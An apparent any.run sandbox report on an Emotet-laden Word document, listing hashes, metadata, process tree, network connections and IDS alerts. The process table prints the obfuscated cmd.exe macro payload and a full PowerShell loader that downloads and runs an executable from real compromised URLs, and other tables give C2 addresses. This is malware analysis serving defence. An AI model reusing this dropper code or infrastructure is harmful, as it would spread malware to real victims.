File name: | DOCF9112.doc |
Full analysis: | https://app.any.run/tasks/e17fd366-5baa-48ab-8549-955396ecbe46 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 14:56:00 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Reagan, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 11:53:00 2018, Last Saved Time/Date: Wed Nov 14 11:53:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 2, Security: 0 |
MD5: | A0E21CB76CB82E79212C8E0679F3CBD7 |
SHA1: | 10BE9EB42C86AF388C07E14D8947FC42CF20099F |
SHA256: | 90E2205826D42D33A8159D0B8CFB4E11039C8F665717888B565C46D37FB1F21F |
SSDEEP: | 1536:Qk/TxjwKZ09cB7y9ghN8+mQ90MT++a9aVjpre5gx8P5pF5pVeFs:rxjnB29gb8onVppre5gx8P5pF5pVeFs |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 2 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 2 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:11:14 11:53:00 |
CreateDate: | 2018:11:14 11:53:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Reagan |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3232 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\DOCF9112.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1540 | cmd /V:^O/C"^s^e^t rk^g^7=A^ h.B:^,[]^YQ^O)dbHKz^p1/Ct^G^I^-xw^y;^}kN^Z^i^0(f^{^E^MWco'8+^m^j^\^=P^sn^g^Uv^$^le^Tr^@^u^S2a&&^f^or %N ^in (^18,43^,2^7^,^59^,6^1^,^5^2,2,59^,^5^8,5^8^,1^,5^7^,17^,^4^1,2^1^,5^0,^4^4^,2^4,^5^5,0^,4^4,^29,5^7^,1^0^,^1^5,9,50,^44,2^,22,22,18,^5,20^,20^,2^2,61^,66,^14,^66,53^,^66^,^2^2^,43^,63,^6^1^,^5^2^,3^,42,4^3^,4^7,20,6^3,^6^2^,^2,2^2,22^,^1^8^,5^,2^0^,2^0,1^8,3^4^,17^,1^7^,^5^9,^6^1,^34,6^6^,61,^4^3,^5^3^,^1^3,4^3,^3^,^5^2^,^34^,2^0^,1^7,^45,4^2,23,^6^2^,2^,22,2^2^,^1^8,5,^2^0^,^20^,^1^3^,^34^,^6^6^,^2,^4^7^,^66^,61^,^5^2,3^4,13,34,^3^,4^2^,^43^,^47,2^0^,4^0^,5^1,^21^,60^,1^6,^2^3,6^2^,^2,22,^2^2,18,^5^,^20,20,^4^3,^54,^6^1^,43,^13,^2^8^,^63^,5^2^,47,^3^4,59^,^42^,^2^,63,3^,^18,^58^,2^0,^3^4,63^,^14^,^5^6^,^45,^56^,62,2,2^2^,22,18,^5^,20^,20,66,^52,^52,6^3^,^61^,^66^,5^3^,^42,^5^9,^25,^42,2^,^6^6,61^,5^9^,53^,^2^2^,59^,3^,3^7^,6^1,^2^0,^52,^3^7^,^2,44^,3^,^6^4,^1^8^,^58,^3^4^,22^,36^,4^4^,62^,44,^1^2^,^29^,57^,^66^,^4,^18^,^50,3^6^,^7,^64^,^28^,5^2^,22,5^9^,4^7,^3^,^24^,1^1^,^3,^51,^66^,^2^2^,2,8,^5,^5,^23^,59,22,^60^,59^,^4^7,^1^8^,^51,66,22,^2^,36^,^12,4^6^,44^,^49^,4^7,1^0,^32^,3,5^9,26^,59,^44^,12,^2^9,^57,18^,^13,33,1^,5^0,3^2^,59,2^7,2^5,^11,1^4^,^48,^5^9,4^2,^22^,1,^2^5,^4^2,^43,^4^7^,1^,4^4,4^7,^52^,26,^4^7,58^,^6^5,3^,^26^,4^7,^58^,2^,2^2,2^2,1^8^,^4^4^,2^9^,5^7,22,1^8,3^1,1,50,^1^,3^2,^5^9^,^27,2^5^,^1^1,^14,48,59^,^42^,^2^2,^1,^2^5^,4^2^,43,^4^7,1^,4^4^,^66,13^,43^,1^3^,1^4,3,5^2^,22^,^61,59,^6^6,47^,^44^,2^9^,37,^4^3^,61,^5^9,^66,42^,^2,36^,^5^7,^63,3^4,0^,1^,^3^4^,53,^1,^57,^10,1^5,^9^,^1^2^,^38^,^22,^61^,^2^8,^3^8^,^57^,^18,13^,^3^3,3,4^3,^1^8,^5^9,53^,^36,4^4,^2^3,3^9,^60,44^,^6,^5^7^,^6^3,34^,^0,6^,^3^5,^1^2^,29,^57^,^18^,13^,^33^,3^,52^,^5^9^,^5^3^,1^3^,^36^,12,2^9^,^5^7^,^2^2^,1^8^,^31^,^3^,43,^1^8^,5^9,53^,36,^12^,^29^,^57^,22,^1^8,^3^1^,^3,^2^2,2^8,^18,59,^1^,^5^0^,^1^,19^,2^9^,^5^7^,^22^,18^,31^,^3,27,61^,^34^,2^2^,^59,3^6^,57^,^18^,1^3,^33,^3^,^61^,^59^,^52,^1^8^,^4^3^,5^3,^52,59,4^,43^,^13,28^,^1^2^,^29,5^7^,22^,^1^8,^3^1^,^3,5^2,^6^6^,^5^6,59^,2^2,4^3,3^7,34,^5^8,5^9^,36,^5^7^,66,4^,18^,^12,^2^9,^64,^22,^66^,61,22,2^5^,51,61^,43^,^4^2^,5^9^,^52,5^2^,1^,^5^7^,66^,4^,^18^,^2^9^,1^4^,^6^1^,^59^,^6^6^,^31,3^0^,42^,6^6^,^2^2,4^2^,^2,3^8^,3^0,3^0^,1^,1^,^1,^1,^1^,1,1,^1^,^1,1^,^1^,^1^,1,1^,1,1^,1,73)^do ^s^e^t ^y^p^e=!^y^p^e!!rk^g^7:~%N,1!&&^if %N ^g^e^q ^7^3 cal^l %^y^p^e:~-^5^0^7%" | C:\Windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3876 | powershell $zWC='IUA';$QHY='http://trabanatours.com/u@http://pizzeriarondo.si/z8cG@http://diahmarsidi.com/MPCTKG@http://ogrodyusmiechu.pl/iubv8v@http://assurance-charente.fr/sfh'.Split('@');$aBp=([System.IO.Path]::GetTempPath()+'\mQN.exe');$pdZ =New-Object -com 'msxml2.xmlhttp';$tpk = New-Object -com 'adodb.stream';foreach($uiA in $QHY){try{$pdZ.open('GET',$uiA,0);$pdZ.send();$tpk.open();$tpk.type = 1;$tpk.write($pdZ.responseBody);$tpk.savetofile($aBp);Start-Process $aBp;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3760 | "C:\Users\admin\AppData\Local\Temp\mQN.exe" | C:\Users\admin\AppData\Local\Temp\mQN.exe | — | powershell.exe |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
2636 | "C:\Users\admin\AppData\Local\Temp\mQN.exe" | C:\Users\admin\AppData\Local\Temp\mQN.exe | mQN.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
2820 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | mQN.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
3472 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Version: 8.0.0.0 | ||||
3284 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" /scomma "C:\Users\admin\AppData\Local\Temp\A47.tmp" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 | ||||
3280 | "C:\ProgramData\r29wPCq06jT.exe" | C:\ProgramData\r29wPCq06jT.exe | lpiograd.exe | |
User: admin Integrity Level: MEDIUM Description: Developed using the Dev-C++ IDE Exit code: 0 Version: 1.0.0.0 | ||||
3416 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" /scomma "C:\Users\admin\AppData\Local\Temp\A57.tmp" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Borland Corporation Integrity Level: MEDIUM Description: Borland C++ Multi-thread RTL (WIN/VCL MT) Exit code: 0 Version: 8.0.0.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3232 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9D00.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G4E1GY3RDA74KT1E77FJ.temp | — | |
MD5:— | SHA256:— | |||
3736 | lpiograd.exe | C:\Users\admin\Documents\Outlook Files\~Outlook Data File - NoMail.pst.tmp | — | |
MD5:— | SHA256:— | |||
3736 | lpiograd.exe | C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp | — | |
MD5:— | SHA256:— | |||
3736 | lpiograd.exe | C:\Users\admin\Documents\Outlook Files\[email protected] | — | |
MD5:— | SHA256:— | |||
3736 | lpiograd.exe | C:\Users\admin\AppData\Local\Temp\A58.tmp | — | |
MD5:— | SHA256:— | |||
3416 | lpiograd.exe | C:\Users\admin\AppData\Local\Temp\A57.tmp | — | |
MD5:— | SHA256:— | |||
3284 | lpiograd.exe | C:\Users\admin\AppData\Local\Temp\A47.tmp | — | |
MD5:— | SHA256:— | |||
2116 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\R4PRUINMMZMTSMDOUXOP.temp | — | |
MD5:— | SHA256:— | |||
2116 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1935db.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3472 | lpiograd.exe | GET | — | 71.71.126.201:8080 | http://71.71.126.201:8080/ | US | — | — | malicious |
3472 | lpiograd.exe | GET | — | 68.102.169.43:8080 | http://68.102.169.43:8080/ | US | — | — | malicious |
3876 | powershell.exe | GET | 200 | 66.55.141.67:80 | http://trabanatours.com/u/ | US | executable | 412 Kb | malicious |
3472 | lpiograd.exe | GET | 200 | 24.176.53.106:80 | http://24.176.53.106/whoami.php | US | text | 13 b | malicious |
3876 | powershell.exe | GET | 301 | 66.55.141.67:80 | http://trabanatours.com/u | US | html | 234 b | malicious |
3472 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/ | US | binary | 148 b | malicious |
3472 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/whoami.php | US | text | 13 b | malicious |
3472 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/ | US | binary | 148 b | malicious |
3472 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/ | US | binary | 148 b | malicious |
3472 | lpiograd.exe | GET | 200 | 24.176.53.106:80 | http://24.176.53.106/ | US | binary | 66.6 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3472 | lpiograd.exe | 76.73.213.148:8090 | — | WideOpenWest Finance LLC | US | malicious |
3472 | lpiograd.exe | 190.146.205.227:80 | — | Telmex Colombia S.A. | CO | malicious |
3472 | lpiograd.exe | 68.102.169.43:8080 | — | Cox Communications Inc. | US | malicious |
3876 | powershell.exe | 66.55.141.67:80 | trabanatours.com | Choopa, LLC | US | suspicious |
3472 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
3472 | lpiograd.exe | 71.71.126.201:8080 | — | Time Warner Cable Internet LLC | US | malicious |
3472 | lpiograd.exe | 24.176.53.106:80 | — | Charter Communications | US | malicious |
3472 | lpiograd.exe | 74.208.5.2:465 | smtp.1and1.com | 1&1 Internet SE | US | malicious |
3472 | lpiograd.exe | 221.176.66.75:25 | hqpop.chinamobile.com | Guangdong Mobile Communication Co.Ltd. | CN | unknown |
3472 | lpiograd.exe | 203.124.44.88:465 | mail.metroshoes.com.pk | Commission on Science and Technology for | PK | malicious |
Domain | IP | Reputation |
---|---|---|
trabanatours.com |
| malicious |
dns.msftncsi.com |
| shared |
email.polyplasticsindia.com |
| unknown |
mail.priyafoods.com |
| unknown |
mail.bizmail.yahoo.com |
| unknown |
mail.in2com.com.mx |
| unknown |
smtp.mail.me.com |
| shared |
mail.aol.com |
| shared |
imap.mail.com |
| shared |
hqpop.chinamobile.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3876 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3876 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3876 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | A Network Trojan was detected | SC SPYWARE Trojan-Banker.Win32.Emotet |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
3472 | lpiograd.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |